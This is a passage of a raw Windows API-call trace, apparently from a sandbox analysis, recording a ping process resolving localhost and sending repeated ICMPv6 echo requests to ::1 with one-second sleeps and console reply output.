lpValueName="DefaultTTL", lpReserved=0x0, lpType=0xaf750, lpData=0xaf758, lpcbData=0xaf754*=0x4 | out: lpType=0xaf750*=0x0, lpData=0xaf758*=0x0, lpcbData=0xaf754*=0x4) returned 0x2 [0195.496] RegCloseKey (hKey=0x58) returned 0x0 [0195.496] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0xaf724*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xaf74c | out: ppResult=0xaf74c*=0x0) returned 11001 [0195.496] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0xaf724*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xaf74c | out: ppResult=0xaf74c*=0x1937b0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="cRh2YWu7", ai_addr=0x193878*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x1938a0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x192818*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) returned 0 [0195.628] FreeAddrInfoW (pAddrInfo=0x1937b0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="cRh2YWu7", ai_addr=0x193878*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x1938a0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x192818*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) [0195.628] Icmp6CreateFile () returned 0x198bb0 [0195.651] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x1938f0 [0195.651] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x19ec28 [0195.652] getnameinfo (in: pSockaddr=0x4c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", 
sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xafc4c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0195.652] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2720, dwLanguageId=0x0, lpBuffer=0xaf74c, nSize=0x0, Arguments=0xaf748 | out: lpBuffer="\x189\x19") returned 0x19 [0195.652] CharToOemBuffA (in: lpszSrc="\r\nPinging cRh2YWu7 [::1] ", lpszDst=0x193918, cchDstLength=0x19 | out: lpszDst="\r\nPinging cRh2YWu7 [::1] ") returned 1 [0195.652] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0195.652] _write (in: _FileHandle=1, _Buf=0x193918*, _MaxCharCount=0x19 | out: _Buf=0x193918*) returned 25 [0195.657] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0195.657] LocalFree (hMem=0x193918) returned 0x0 [0195.657] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0xaf750, nSize=0x0, Arguments=0xaf74c | out: lpBuffer="\x189\x19") returned 0x18 [0195.657] CharToOemBuffA (in: lpszSrc="with 32 bytes of data:\r\n", lpszDst=0x193918, cchDstLength=0x18 | out: lpszDst="with 32 bytes of data:\r\n") returned 1 [0195.657] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0195.657] _write (in: _FileHandle=1, _Buf=0x193918*, _MaxCharCount=0x18 | out: _Buf=0x193918*) returned 24 [0195.658] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0195.658] LocalFree (hMem=0x193918) returned 0x0 [0195.658] SetConsoleCtrlHandler (HandlerRoutine=0x4c17ca, Add=1) returned 1 [0195.658] Icmp6SendEcho2 (in: IcmpHandle=0x198bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xaf7c8, DestinationAddress=0x4c55e0, RequestData=0x1938f0, RequestSize=0x20, RequestOptions=0xaf778, ReplyBuffer=0x19ec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x19ec28) returned 0x1 [0195.661] getnameinfo (in: pSockaddr=0x4c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", 
sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xafc4c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0195.661] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xaf750, nSize=0x0, Arguments=0xaf74c | out: lpBuffer="\xe0\x51\x19") returned 0x10 [0195.662] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x1951e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0195.662] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0195.662] _write (in: _FileHandle=1, _Buf=0x1951e0*, _MaxCharCount=0x10 | out: _Buf=0x1951e0*) returned 16 [0195.662] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0195.662] LocalFree (hMem=0x1951e0) returned 0x0 [0195.662] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x10*\x19") returned 0x9 [0195.662] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x192a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0195.662] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0195.662] _write (in: _FileHandle=1, _Buf=0x192a10*, _MaxCharCount=0x9 | out: _Buf=0x192a10*) returned 9 [0195.662] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0195.662] LocalFree (hMem=0x192a10) returned 0x0 [0195.662] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x90\x8f\x19") returned 0x2 [0195.662] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x198f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0195.662] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0195.662] _write (in: _FileHandle=1, _Buf=0x198f90*, _MaxCharCount=0x2 | out: _Buf=0x198f90*) returned 2 [0195.663] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0195.663] LocalFree (hMem=0x198f90) returned 0x0 
[0195.663] Sleep (dwMilliseconds=0x3e8) [0196.963] Icmp6SendEcho2 (in: IcmpHandle=0x198bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xaf7c8, DestinationAddress=0x4c55e0, RequestData=0x1938f0, RequestSize=0x20, RequestOptions=0xaf778, ReplyBuffer=0x19ec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x19ec28) returned 0x1 [0197.165] getnameinfo (in: pSockaddr=0x4c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xafc4c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0197.165] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xaf750, nSize=0x0, Arguments=0xaf74c | out: lpBuffer="\xe0\x51\x19") returned 0x10 [0197.165] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x1951e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0197.165] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0197.165] _write (in: _FileHandle=1, _Buf=0x1951e0*, _MaxCharCount=0x10 | out: _Buf=0x1951e0*) returned 16 [0197.165] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0197.165] LocalFree (hMem=0x1951e0) returned 0x0 [0197.165] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x10*\x19") returned 0x9 [0197.165] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x192a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0197.165] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0197.165] _write (in: _FileHandle=1, _Buf=0x192a10*, _MaxCharCount=0x9 | out: _Buf=0x192a10*) returned 9 [0197.165] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0197.165] LocalFree (hMem=0x192a10) returned 0x0 [0197.165] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, 
lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x90\x8f\x19") returned 0x2 [0197.165] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x198f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0197.165] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0197.165] _write (in: _FileHandle=1, _Buf=0x198f90*, _MaxCharCount=0x2 | out: _Buf=0x198f90*) returned 2 [0197.169] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0197.169] LocalFree (hMem=0x198f90) returned 0x0 [0197.169] Sleep (dwMilliseconds=0x3e8) [0198.360] Icmp6SendEcho2 (in: IcmpHandle=0x198bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xaf7c8, DestinationAddress=0x4c55e0, RequestData=0x1938f0, RequestSize=0x20, RequestOptions=0xaf778, ReplyBuffer=0x19ec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x19ec28) returned 0x1 [0198.567] getnameinfo (in: pSockaddr=0x4c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xafc4c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0198.567] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xaf750, nSize=0x0, Arguments=0xaf74c | out: lpBuffer="\xe0\x51\x19") returned 0x10 [0198.567] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x1951e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0198.567] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0198.567] _write (in: _FileHandle=1, _Buf=0x1951e0*, _MaxCharCount=0x10 | out: _Buf=0x1951e0*) returned 16 [0198.568] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0198.568] LocalFree (hMem=0x1951e0) returned 0x0 [0198.568] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x10*\x19") returned 0x9 [0198.568] 
CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x192a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0198.568] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0198.568] _write (in: _FileHandle=1, _Buf=0x192a10*, _MaxCharCount=0x9 | out: _Buf=0x192a10*) returned 9 [0198.568] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0198.568] LocalFree (hMem=0x192a10) returned 0x0 [0198.568] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x90\x8f\x19") returned 0x2 [0198.568] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x198f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0198.568] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0198.568] _write (in: _FileHandle=1, _Buf=0x198f90*, _MaxCharCount=0x2 | out: _Buf=0x198f90*) returned 2 [0198.580] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0198.580] LocalFree (hMem=0x198f90) returned 0x0 [0198.580] Sleep (dwMilliseconds=0x3e8) [0199.633] Icmp6SendEcho2 (in: IcmpHandle=0x198bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xaf7c8, DestinationAddress=0x4c55e0, RequestData=0x1938f0, RequestSize=0x20, RequestOptions=0xaf778, ReplyBuffer=0x19ec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x19ec28) returned 0x1 [0199.802] getnameinfo (in: pSockaddr=0x4c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xafc4c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0199.802] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xaf750, nSize=0x0, Arguments=0xaf74c | out: lpBuffer="\xe0\x51\x19") returned 0x10 [0199.803] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x1951e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") 
returned 1 [0199.803] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0199.803] _write (in: _FileHandle=1, _Buf=0x1951e0*, _MaxCharCount=0x10 | out: _Buf=0x1951e0*) returned 16 [0199.803] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0199.803] LocalFree (hMem=0x1951e0) returned 0x0 [0199.803] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x10*\x19") returned 0x9 [0199.803] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x192a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0199.803] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0199.803] _write (in: _FileHandle=1, _Buf=0x192a10*, _MaxCharCount=0x9 | out: _Buf=0x192a10*) returned 9 [0199.803] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0199.803] LocalFree (hMem=0x192a10) returned 0x0 [0199.803] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x90\x8f\x19") returned 0x2 [0199.803] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x198f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0199.803] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0199.803] _write (in: _FileHandle=1, _Buf=0x198f90*, _MaxCharCount=0x2 | out: _Buf=0x198f90*) returned 2 [0200.097] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0200.097] LocalFree (hMem=0x198f90) returned 0x0 [0200.097] Sleep (dwMilliseconds=0x3e8) [0201.352] Icmp6SendEcho2 (in: IcmpHandle=0x198bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xaf7c8, DestinationAddress=0x4c55e0, RequestData=0x1938f0, RequestSize=0x20, RequestOptions=0xaf778, ReplyBuffer=0x19ec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x19ec28) returned 0x1 [0201.358] getnameinfo (in: pSockaddr=0x4c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), 
SockaddrLength=0x1c, pNodeBuffer=0xafc4c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0201.358] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xaf750, nSize=0x0, Arguments=0xaf74c | out: lpBuffer="\xe0\x51\x19") returned 0x10 [0201.358] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x1951e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0201.358] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0201.358] _write (in: _FileHandle=1, _Buf=0x1951e0*, _MaxCharCount=0x10 | out: _Buf=0x1951e0*) returned 16 [0201.466] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0201.466] LocalFree (hMem=0x1951e0) returned 0x0 [0201.466] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x10*\x19") returned 0x9 [0201.467] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x192a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0201.467] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0201.467] _write (in: _FileHandle=1, _Buf=0x192a10*, _MaxCharCount=0x9 | out: _Buf=0x192a10*) returned 9 [0201.467] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0201.467] LocalFree (hMem=0x192a10) returned 0x0 [0201.467] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x90\x8f\x19") returned 0x2 [0201.467] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x198f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0201.467] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0201.467] _write (in: _FileHandle=1, _Buf=0x198f90*, _MaxCharCount=0x2 | out: _Buf=0x198f90*) returned 2 [0201.468] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0201.468] LocalFree (hMem=0x198f90) returned 0x0 [0201.468] Sleep 
(dwMilliseconds=0x3e8) [0202.663] Icmp6SendEcho2 (in: IcmpHandle=0x198bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xaf7c8, DestinationAddress=0x4c55e0, RequestData=0x1938f0, RequestSize=0x20, RequestOptions=0xaf778, ReplyBuffer=0x19ec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x19ec28) returned 0x1 [0202.819] getnameinfo (in: pSockaddr=0x4c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xafc4c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0202.819] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xaf750, nSize=0x0, Arguments=0xaf74c | out: lpBuffer="\xe0\x51\x19") returned 0x10 [0202.819] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x1951e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0202.819] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0202.819] _write (in: _FileHandle=1, _Buf=0x1951e0*, _MaxCharCount=0x10 | out: _Buf=0x1951e0*) returned 16 [0202.820] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0202.820] LocalFree (hMem=0x1951e0) returned 0x0 [0202.820] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x10*\x19") returned 0x9 [0202.820] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x192a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0202.820] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0202.820] _write (in: _FileHandle=1, _Buf=0x192a10*, _MaxCharCount=0x9 | out: _Buf=0x192a10*) returned 9 [0202.820] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0202.820] LocalFree (hMem=0x192a10) returned 0x0 [0202.820] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, 
lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x90\x8f\x19") returned 0x2 [0202.820] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x198f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0202.820] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0202.820] _write (in: _FileHandle=1, _Buf=0x198f90*, _MaxCharCount=0x2 | out: _Buf=0x198f90*) returned 2 [0202.822] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0202.822] LocalFree (hMem=0x198f90) returned 0x0 [0202.822] Sleep (dwMilliseconds=0x3e8) [0203.886] Icmp6SendEcho2 (in: IcmpHandle=0x198bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xaf7c8, DestinationAddress=0x4c55e0, RequestData=0x1938f0, RequestSize=0x20, RequestOptions=0xaf778, ReplyBuffer=0x19ec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x19ec28) returned 0x1 [0204.096] getnameinfo (in: pSockaddr=0x4c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xafc4c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0204.096] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xaf750, nSize=0x0, Arguments=0xaf74c | out: lpBuffer="\xe0\x51\x19") returned 0x10 [0204.096] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x1951e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0204.096] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0204.096] _write (in: _FileHandle=1, _Buf=0x1951e0*, _MaxCharCount=0x10 | out: _Buf=0x1951e0*) returned 16 [0204.097] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0204.097] LocalFree (hMem=0x1951e0) returned 0x0 [0204.097] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x10*\x19") returned 0x9 [0204.097] 
CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x192a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0204.097] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0204.097] _write (in: _FileHandle=1, _Buf=0x192a10*, _MaxCharCount=0x9 | out: _Buf=0x192a10*) returned 9 [0204.097] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0204.097] LocalFree (hMem=0x192a10) returned 0x0 [0204.097] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x90\x8f\x19") returned 0x2 [0204.097] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x198f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0204.097] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0204.097] _write (in: _FileHandle=1, _Buf=0x198f90*, _MaxCharCount=0x2 | out: _Buf=0x198f90*) returned 2 [0204.167] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0204.167] LocalFree (hMem=0x198f90) returned 0x0 [0204.167] Sleep (dwMilliseconds=0x3e8) [0205.276] Icmp6SendEcho2 (in: IcmpHandle=0x198bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xaf7c8, DestinationAddress=0x4c55e0, RequestData=0x1938f0, RequestSize=0x20, RequestOptions=0xaf778, ReplyBuffer=0x19ec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x19ec28) returned 0x1 [0205.335] getnameinfo (in: pSockaddr=0x4c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xafc4c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0205.335] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xaf750, nSize=0x0, Arguments=0xaf74c | out: lpBuffer="\xe0\x51\x19") returned 0x10 [0205.335] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x1951e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") 
returned 1 [0205.335] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0205.335] _write (in: _FileHandle=1, _Buf=0x1951e0*, _MaxCharCount=0x10 | out: _Buf=0x1951e0*) returned 16 [0205.335] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0205.335] LocalFree (hMem=0x1951e0) returned 0x0 [0205.335] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x10*\x19") returned 0x9 [0205.335] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x192a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0205.335] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0205.335] _write (in: _FileHandle=1, _Buf=0x192a10*, _MaxCharCount=0x9 | out: _Buf=0x192a10*) returned 9 [0205.336] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0205.336] LocalFree (hMem=0x192a10) returned 0x0 [0205.336] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xaf754, nSize=0x0, Arguments=0xaf750 | out: lpBuffer="\x90\x8f\x19") returned 0x2 [0205.336] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x198f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0205.336] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0205.336] _write (in: _FileHandle=1, _Buf=0x198f90*, _MaxCharCount=0x2 | out: _Buf=0x198f90*) returned 2 [0205.337] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0205.337] LocalFree (hMem=0x198f90) returned 0x0 [0205.337] Sleep (dwMilliseconds=0x3e8) [0206.431] Icmp6SendEcho2 (in: IcmpHandle=0x198bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xaf7c8, DestinationAddress=0x4c55e0, RequestData=0x1938f0, RequestSize=0x20, RequestOptions=0xaf778, ReplyBuffer=0x19ec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x19ec28) returned 0x1 [0206.644] getnameinfo (in: pSockaddr=0x4c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), 
